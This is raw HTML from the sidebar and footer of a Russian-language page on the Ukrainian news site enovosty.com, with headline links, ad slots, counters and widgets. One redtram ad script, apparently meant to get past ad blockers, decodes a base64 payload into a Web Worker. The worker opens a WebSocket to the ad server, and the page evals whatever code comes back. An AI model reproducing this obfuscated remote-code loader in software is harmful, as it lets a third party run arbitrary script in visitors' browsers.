				<p class="press"><a href="https://enovosty.com/publications/full/1606-kakie-avtomobili-potreblyayut-menshe-goryuchego-obzor-rynka">Какие автомобили потребляют меньше топлива: Обзор рынка</a></p>
		</div>
	
<!-- /59256651/enovosty_adint_300_600 -->
<div id='div-gpt-ad-1594112815543-0'>
  <script>
	googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });
  </script>
</div>

</br>









<!-- pravdomer -->


<div id="adriver_banner_C3"></div>

	
 
	<div class="wiget simple_line infblogs"> 
		<div class="caption">
			<a href="https://enovosty.com/blogs">Мнения</a>
			<!-- <span class="postDate">01&nbsp;июня,&#160;2021</span> -->
		</div>
		<div class="block">
							<div class="cblock">
					<a href="https://enovosty.com/blogs/full/106-pyat-prichin-pochemu-ukrainu-ne-priglasili-na-sammit-nato"><img alt="Пять причин, почему Украину не пригласили на саммит НАТО" src="https://enovosty.com/wp-content/uploads/2021/06/original-112x67.jpg"><div>Константин Елисеев</div></a>
				</div>
						<p><a class="postTitle" href="https://enovosty.com/blogs/full/106-pyat-prichin-pochemu-ukrainu-ne-priglasili-na-sammit-nato">Пять причин, почему Украину не пригласили на саммит НАТО</a></p>
			<span class="postExcerpt"><a href="https://enovosty.com/blogs/full/106-pyat-prichin-pochemu-ukrainu-ne-priglasili-na-sammit-nato">Надо делать выводы</a></span>
		</div>
	</div>	



   
<!-- pr -->
<div class="wiget simple_pr" style="margin-top:5px;">
	<div>
		  
		 
			  <div class="caption"> 
					<div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div>
					<div class="popular-sort">
						<div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div>
						<div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div>				
						<div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div>	
					</div>		
			  </div>
			  <div class="newsbody">
			  <p class="press"><a href="https://enovosty.com/news/zdorove/full/2206-sinoptiki-soobshhili-kogda-ukraine-zakonchitsya-zhara">Синоптики сообщили, когда в Украине закончится жара (14331)</a></p><p class="press"><a href="https://enovosty.com/news/news_sport/full/2406-v-seti-poyavilis-smeshnye-fotozhaby-pro-vyxod-sbornoj-ukrainy-v-plej-off-evro-2020">В Сети появились смешные фотожабы про выход сборной Украины в плей-офф Евро-2020 (8616)</a></p><p class="press"><a href="https://enovosty.com/uk/news-ukr/news_incidents-ukr/full/1606-koroleva-yelizaveta-ii-obzavelasya-novim-puxnastim-ulyublencem">У королеви Єлизавети II з'явився новий пухнастий улюбленець - цуценя породи коргі (ФОТО) (7990)</a></p></div>	</div>
</div>

	</br>

		<br>
	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
	<!-- 300_c2 -->
	<ins class="adsbygoogle"
		 style="display:inline-block;width:300px;height:250px"
		 data-ad-client="ca-pub-1008673670491634"
		 data-ad-slot="6220472701"></ins>
	<script>
	(adsbygoogle = window.adsbygoogle || []).push({});
	</script>
	<br>
	
		
</br>
						

<!--		     
<div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div>
<br>
-->
<div id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570' data-sender='go2net'></div>
<script type='text/javascript'>
	(window.globalAmlAds = window.globalAmlAds || []).push(function() {
globalAml.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');
});
</script>
<br>



			

	<div id="pravdomer_info" style="margin-top:5px">
		<a href="https://besplatka.ua/ru/rabota" target="_blank">
		<img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua">
		</a>  
	</div>
	<br>



<div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');">
	<div class="wiget simple"><div id="n4p_30546">
<script class="r36857" type="text/javascript">
    (function() {
        var worker36857,
            tickerID = 36857,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36857'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36857');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36857.postMessage(data);
                }

                worker36857 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36857.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36857.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
</div></div> 
</div>




<br>
	<div>
		<a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank">
			<img alt="Экономические новости youtube" width="300" height="250" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif">
		</a>
	</div>

</br>





<!-- start NEW_right_v1 for enovosty.com -->
<div id="adpartner-jsunit-4125">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_right_v1 for enovosty.com -->
</br>

		
<!-- Gismeteo informer START -->
<link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css">
<div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px">
  <div class="gsIContent">
    <div id="cityLink">
        <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank">
            <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве">
        </a>
    </div>
    <div class="gsLinks">
     <table>
       <tr>
         <td>
           <div class="leftCol">
             <a href="https://www.gismeteo.ua" target="_blank" title="Погода">
               <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/>
               <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px">
             </a>
           </div>
           <div class="rightCol">
             <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели">
                <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели">
             </a>
           </div>
           </td>
        </tr>
      </table>
    </div>
  </div>
</div>
<script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script>
<!-- Gismeteo informer END -->

</br>

				<div>
					<a href="https://enovosty.com/finance/full/2206-nulevaya-deklaraciya-ze-vlast-zagonyaet-grazhdan-strany-v-dolgovuyu-yamu" target="_blank" rel="noreferrer noopener">
						<img alt="Декларация" src="/wp-content/uploads/2021/06/deklaraciyz.jpg">
					</a>
				</div>
			</br>
				
				
				<div id="help" style="margin-bottom: 15px;">
		<a href="https://dobro.ua/" target="_blank" rel="nofollow">
			<img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help">
		</a>
	</div>


<!--
<br>
	<div>
		<a href="https://enovosty.com/politika/full/502-vybory-2019-v-ocenkax-ekspertov-esli-ne-poroshenko-to-kto">
			<img alt="Выборы-2019 в оценках экспертов" src="https://enovosty.com/wp-content/themes/eizvestia/img/Vybory2.jpg">
		</a>
	</div>
<br>
-->


<!-- informer forum -->



<!-- HELP -->

<br>


<!--
<div id="help" style="margin-bottom: 15px;">
	<a href="https://ubb.org.ua/uk/project/5571/" target="_blank" rel="nofollow">
		<img style="width:300px;" src="/wp-content/themes/eizvestia/img/Dopomoga1.jpg" alt="help">
	</a>
</div>
<br>
-->






 


 
	
<!-- enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video -->















	
	

	



<div class="wiget ukr_links" style="font-size:9px; color:#336699;"> 		
	
     </div>
	 
<!--LiveInternet counter--><script type="text/javascript">
document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><!--/LiveInternet-->
<br><br>



<!-- inc poll -->
<div class="links_bal" style="width:240px;">
		
</div>
	
<div class="links_bal" style="width:240px;">
<!-- putslinkshere -->
<!-- putslinkshere -->
</div>

 
<!-- inc banner d1 -->

   <!-- inc redtram.news -->




<div class="wiget ukr_links" style="font-size:9px; color:#336699;"> 
		</div>



<!--bigmir)net TOP 100 Part 2-->
</br>

<a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>

<!--bigmir)net TOP 100 Part 2-->


<!-- end right sidebar -->
</div>

<!--</div> -->
<div class="cls"></div>

<script> 
  
  window.onload = function() { 
  
    // Delay to allow the async Google Ads to load
    setTimeout(function() { 
      
      // Get the first AdSense ad unit on the page
      var ad = document.querySelector("ins.adsbygoogle");
      
      // If the ads are not loaded, track the event
      if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {

        if (typeof ga !== 'undefined') {

            // Log an event in Universal Analytics
            // but without affecting overall bounce rate
            ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1}); 

        } else if (typeof _gaq !== 'undefined') {

            // Log a non-interactive event in old Google Analytics
            _gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);

        }
      }
    }, 2000); // Run ad block detection 2 seconds after page load
  }; 
  
</script> <!-- sidebars -->

</div> <!-- id=body -->


<!-- start NEW_content_v1 for enovosty.com 
<div id="adpartner-jsunit-3430">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
        head.appendChild(script);
    </script>
</div>
 end NEW_content_v1 for enovosty.com -->


<!-- begin footer -->
<div class="cls"></div>
<br>
       <div id="footer">
        <div class="wiget text" style="padding-right:0; margin-right:0;" >
                <div id="bottom-menu" style="background: #F93; height:40px">
				    
							<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|
							<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|
							<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|
							<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a>
						    
									</div>
                <div id="counters" >
				
				
                  </div>
                  <div id="textfooter">
                  <p>2018 &copy; "Экономические новости"</p>
                  <p>Все права защищены.				  </p>
<p>Использование материалов разрешается при условии ссылки на 
	<a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a>
 (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />
Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p>
                  </div>
				  <!-- https://prnews.io/ru/sites/85-enovostycom.html?i=11347 -->
				    
					  <a href="/contacts" target="_blank" rel="nofollow" style="
							float: right;
							font-weight: bold;
							color: #369;
							padding: 10px;
						">Размещение рекламы</a>
				 	
        </div>

    </div>
    
		<div class="links_bal">   
	
		</div>
</div>


	<script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script>
	
		
		<script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script>
				<script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script>
	
						<div id="error-notification-id" class="enp-4853050"></div>
						<div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div>
				   <a href='javascript:void(0);' id='wpdUserContentInfoAnchor' style='display:none;' rel='#wpdUserContentInfo' data-wpd-lity>wpDiscuz</a><div id='wpdUserContentInfo' style='overflow:auto;background:#FDFDF6;padding:20px;width:600px;max-width:100%;border-radius:6px;' class='lity-hide'></div><div id='wpd-editor-source-code-wrapper-bg'></div><div id='wpd-editor-source-code-wrapper'><textarea id='wpd-editor-source-code'></textarea><button id='wpd-insert-source-code'>Insert</button><input type='hidden' id='wpd-editor-uid' /></div><script type='text/javascript' id='error_notification_script-js-extra'>
/* <![CDATA[ */
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
/* ]]> */
</script>
<script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js?ver=1.3' id='error_notification_script-js'></script>
<script type='text/javascript' id='wpdiscuz-combo-js-js-extra'>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</script>
<script type='text/javascript' id='wpdiscuz-combo-js-js-before'>
        var wpdiscuzEditorOptions = {
        modules: {
        toolbar: "",
        counter: {
        uniqueID: "",
        commentmaxcount : 0,
        replymaxcount : 0,
        commentmincount : 1,
        replymincount : 1,
        },
		        },
        wc_be_the_first_text: "\u041e\u0441\u0442\u0430\u0432\u044c\u0442\u0435 \u043f\u0435\u0440\u0432\u044b\u0439 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439!",
        wc_comment_join_text: "\u041f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u043a \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u044e",
        theme: 'snow',
        debug: 'error'
        };
		
</script>
<script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wpdiscuz/assets/js/wpdiscuz-combo.min.js?ver=7.2.2' id='wpdiscuz-combo-js-js'></script>
<script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js?ver=5.7' id='wp-embed-js'></script>
<script type="text/javascript">(function() {
				var expirationDate = new Date();
				expirationDate.setTime( expirationDate.getTime() + 31536000 * 1000 );
				document.cookie = "pll_language=ru; expires=" + expirationDate.toUTCString() + "; path=/; domain=.enovosty.com; secure; SameSite=Lax";
			}());</script>	
		
	


	<script>
//		new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
        new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});
		new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});
//		new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
		new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});
		new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});
//		new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
	</script>
	
		
	
	
	

		
		<script>
	document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
	//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
	</script>
	<script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script>  
	<script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script>

		<script>
		//var pollsL10n = document.getElementById('pollsL10n');
	</script>
	
							
				
	
	


<!--<script type="text/javascript">
    admixerML.fn.push(function () {
        admixerML.defineSlot({
            z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',
            ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',
            i: 'inv-nets'
        });
        admixerML.singleRequest();
    });
</script>-->







		<!-- 
		<script type="text/javascript" charset="utf-8">
		  (function(d,s){
			var o=d.createElement(s);
			o.async=true;
			o.type="text/javascript";
			o.charset="utf-8";
			o.src="https://js.ru.redtram.com/n4p/0/27/ticker_27280.js";
			var x=d.getElementsByTagName(s)[0];
			x.parentNode.insertBefore(o,x);
		  })(document,"script");
		</script>
		-->
					
			
					

<!--
	<script type="text/javascript" charset="utf-8">
		(function(d,s){
			var o=d.createElement(s);
			o.async=true;
			o.type="text/javascript";
			o.charset="utf-8";
			if (location.protocol == "https:")
			{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }
			else
			{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }
			var x=d.getElementsByTagName(s)[0];
			x.parentNode.insertBefore(o,x);
		})(document,"script");
	</script>
-->
<script>jQuery(document).ready(function($){
setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);
});
</script>


<div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div>



	<!-- MMI CMeter -->
	<!-- /MMI CMeter -->

 



<!--- 01212138 --><iframe name="n01212138" style="display:none"></iframe><script>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</script>




<script type="text/javascript">
	if (typeof window._tx === "undefined") {
	var s = document.createElement("script");
	s.type = "text/javascript";
	s.async = true;
	s.src = "//st.hbrd.io/ssp.js"; 
	(document.getElementsByTagName("head")[0] ||
	document.getElementsByTagName("body")[0]).appendChild(s);
	}
	window._tx = window._tx || {};
	window._tx.cmds = window._tx.cmds || [];
	window._tx.cmds.push(function () {
	window._tx.init();
	});
</script>





	<div class="container">
		<div id="div-gpt-ad-1595961600637-0">
			<script>
			
				setTimeout(function(){ 
					var element = document.getElementById('hstp_51671_push_frame');
						// if not advertising
					if (!element) {
						catfish('div-gpt-ad-1595961600637-0');
					}	
				
				}, 1000);
				
		
			
				/*
				window.onload = function() {

					var element = document.getElementById('hstp_51671_push_frame');
					// if not advertising
					if (!element) {
						
						*/
				// catfish('div-gpt-ad-1595961600637-0');
						/*
					}	
				};
				*/
				
			</script>
		</div>
	</div>
	

</body>
</html>
		
		